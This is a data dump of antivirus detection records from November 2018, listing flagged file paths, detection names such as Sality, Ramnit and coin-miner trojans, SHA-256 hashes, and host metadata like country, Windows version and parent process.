  Row(detection=Row(filename='avscan-20181102-050526-e156498d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050526-E156498D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054745-cafd8ea2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054745-CAFD8EA2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053602-27d84260', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053602-27D84260', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062623-308071d7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062623-308071D7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060956-e45ca3ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060956-E45CA3AC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052518-a82d689d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052518-A82D689D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp10492650\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:10:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152450-3c9b653e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-152056-1BEC4832\\AVSCAN-20181101-152450-3C9B653E', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:43:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155536-bdab8b84', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155536-BDAB8B84', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:55:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-210523-1b8a32da', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_579e1550\\AVSCAN-20181031-210339-10A15C0C\\AVSCAN-20181031-210523-1B8A32DA', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T00:05:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ff_tomsmocomp.dll', filepath='\\\\?\\E:\\暴风影音\\codec\\ff_TomsMoComp.dll', filesize=4160000, name='W32/Ramnit.CD.#M1.#R1'), hash='0640858091c79cfc0c34b4d19e378baff12bdcd2ce782ea93ed5790a6d3eb6c7', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:20:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:23:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-01T23:09:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ist.exe', filepath='\\\\?\\C:\\11\\Internet Secure Tunneling 2.0.0.244\\1\\Ist.exe', filesize=852000, name='TR/Crypt.XPACK.Gen.#M300.#R471'), hash='1a59ca13c65517a7f07e3d05c6b810d7b62ab2231708273e90c83f1fe710547b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:07:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:00:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T09:12:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160105-f5223c24', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160105-F5223C24', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:01:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwh5be.exe', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH5BE.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:31:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:10:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='riched32.dll', filepath='\\\\?\\C:\\WINDOWS\\SysWOW64\\ka-GE\\S-1-4-46\\Riched32.dll', filesize=256000, name='TR/AD.CoinLoader.B.#M1.#R1'), hash='4af82a3625f018fb014888948f76a681bbfe1b2bb6624b2002f06142f0712333', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:38:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155457-38742f86', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-155204-205028ED\\AVSCAN-20181101-155457-38742F86', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:13:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='servertool.exe', filepath='C:\\Program Files\\Java\\jre6\\bin\\servertool.exe', filesize=116000, name='W32/Sality.AW.#M1.#R1'), hash='11ccb466a25dc3bc38249c2810824d9df9a341fdb4c090435dd0306786c891fa', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T02:56:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe982_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe982 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T07:16:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154704-676ffe4b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154704-676FFE4B', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:47:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setuparp.exe', filepath='\\\\SERVER-GOLD\\HOME\\SUPERMARKET\\NONFOOD\\NONFOOD [SIL&DJU]\\SILMI\\MISILSS EVENT\\Corel\\CORELDRAW GRAPHICS SUITE X7\\Setup\\SetupARP.exe', filesize=2652000, name='W32/Sality.AT.#M1.#R1'), hash='4cb7c731ae70c5c30918d5f22ed251e627af3be6dfe79691d1fe752c70f8dd54', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\dwm.exe', parentsize=92672, timestamp='2018-11-01T09:03:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=6144000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='16ce47ce1092f08d97948956c7ff57c947de13c9df6b8a0d96f2dbcff3f5d02f', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T17:57:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1941883fc633c8bbebef7d30e9cfec9fcc29dbd588b3eb1dce985bb47e138aa1', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\1941883FC633C8BBEBEF7D30E9CFEC9FCC29DBD588B3EB1DCE985BB47E138AA1', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1941883fc633c8bbebef7d30e9cfec9fcc29dbd588b3eb1dce985bb47e138aa1', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:50:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155132-94b66376', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155132-94B66376', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:51:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110930-ef804bfb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110930-EF804BFB', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:09:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-072316-84cc3d78', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a7e63996\\AVSCAN-20181102-071158-45CB0B7A\\AVSCAN-20181102-072316-84CC3D78', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='a0365a74b54ffa4da0563c30141ed8d4927bc5dc1337e79af6c1127e100e4fc8', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:23:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:33:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-195648-106ad8ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_058d263d\\AVSCAN-20181101-194346-9A701436\\AVSCAN-20181101-195648-106AD8EF', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='731393a63a1aea598a83191165266496274c44985a23f8a0182b95b3c06b5c90', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:56:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcoded_000', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\Transcoded_000', filesize=6912000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='84c30cb4623e543677a61952a38e18b7a276d2e9768662c178919ac59aea5964', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T05:30:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='utorrentie.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\uTorrent\\updates\\3.4.9_43085\\utorrentie.exe', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='89110efd86895b1f71c8e2e9fd9f8b7480cd894f33584a6c37a6409a3c47db6b', metadata=Row(cmdline='\\\\\\/apps \\\\\\/fast \\\\\\/ext \\\\\\"exe,sys\\\\\\" \\\\\\/output \\\\\\"C:\\\\\\\\Windows\\\\\\\\TEMP\\\\\\\\CompatTelemetryLogs\\\\\\\\WICA_Programs_SAMSUNGNP300E5A.xml\\\\\\" \\\\\\/log \\\\\\"C:\\\\\\\\Windows\\\\\\\\TEMP\\\\\\\\CompatTelemetryLogs\\\\\\" \\\\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\CompatTel\\\\\\"', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTel\\wicainventory.exe', parentsize=None, timestamp='2018-11-01T06:07:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:01:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-222832-571b0f7c', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-222747-E684C720\\AVSCAN-20181101-222832-571B0F7C', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:27:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-210439-4c63d6f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23dd5805\\AVSCAN-20181101-210213-3C49D68C\\AVSCAN-20181101-210439-4C63D6F2', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:04:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='windows 8.1 activator by ahmad magdi.exe', filepath='\\?\\F:\\Computer\\Windows 8.1 Activator By Ahmad Magdi.exe', filesize=1216000, name='W32/Neshta.A.#M1.#R1'), hash='c89ddf8360bcc355e70782b12fa54a89cac4c209dd726afadd0af5162b386de7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:52:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tubetools_458ecf5.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa13776.38248\\tubetools_458ecf5.exe', filesize=3136000, name='HEUR/AGEN.1020138.#M1.#R1'), hash='be57411ce50887ba2525a238649ebf3c5d31c21ff44f725b30eb7d725f8db271', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\tubetools_458ecf5.iso\\\\\\"', country='SE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=2266328, timestamp='2018-11-01T23:52:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sbn.exe', filepath='d:\\mis documentos\\papeles de trabajo_tia dulia\\usb yesenia\\siaf_presupuesto\\SBN.EXE', filesize=888000, name='HEUR/APC.#M1.#R1'), hash='7897d82378f9b8bd2ba7312663d433a0a82d497c1790f8161653b74db2e27563', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T14:07:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-121915-019ed44b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-121843-E68DAD8F\\AVSCAN-20181101-121915-019ED44B', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:19:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-112049-4511b77d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-112049-4511B77D', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:20:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-165018-66e86635', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1e059e1d\\AVSCAN-20181101-164958-64194333\\AVSCAN-20181101-165018-66E86635', filesize=284000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='cf6c113a22587766ee6de6895df8d56fc651213926f6235d9d175e42b00cd4ba', metadata=Row(cmdline=None, country='LK', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T11:20:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-173723-99c707b8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4031c70e\\AVSCAN-20181101-173632-8FCF215A\\AVSCAN-20181101-173723-99C707B8', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='bed5637ba573b79fb13c77cf89b937f3e05cf99c1287e241dea544661e377870', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T16:37:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate (2).exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\flashupdate (2).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='AZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:40:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111944-3cf87530', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111944-3CF87530', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:19:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rthdcpl.exe', filepath='C:\\Program Files\\Realtek\\InstallShield\\RTHDCPL.exe', filesize=16128000, name='TR/Patched.Gen.#M300.#R2947'), hash='ab648793e83e05a712df2df6abce4747ebb5df986d0be72275408f337c2c8f57', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:3yJp443Bu0ax06Ho.1', country='LB', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=126264, timestamp='2018-11-01T07:19:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered lacid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lacid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a70a3042b79fab309d8c4c27918d2264c8f48d6169355e45c8fbd8c074c3329a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T11:52:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0198500.exe', filepath='g:\\system volume information\\_restore{e0007dec-1129-45c8-a279-d04879e6ca59}\\rp75\\A0198500.EXE', filesize=3072000, name='W32/Sality.AT.#M1.#R1'), hash='76cf8ed3116768fe89ea7581339e051bcc241ad392a9c449da4fa2feb1158c32', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:44:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110041-5a766f8f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32bc38d8\\AVSCAN-20181101-105854-4E0AB3FC\\AVSCAN-20181101-110041-5A766F8F', filesize=6912000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='d36c38ca859dfcf938e171fd27d4bb1dc4198e006b312261947eef20d201a229', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T08:00:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='keygen.exe', filepath='J:\\雕刻机光盘\\雕刻机光盘\\KCM4中文版\\破解文件\\kcam4破解\\KEYGEN.EXE', filesize=64000, name='W32/Jadtre.K.#M1.#R1'), hash='18c26fb8ddc591b99efaf5ee7c8eea563b1a2b3d36c667e4693d1915ac0adff9', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T14:29:56Z'), dt=datetime.date(2018, 11, 1)),
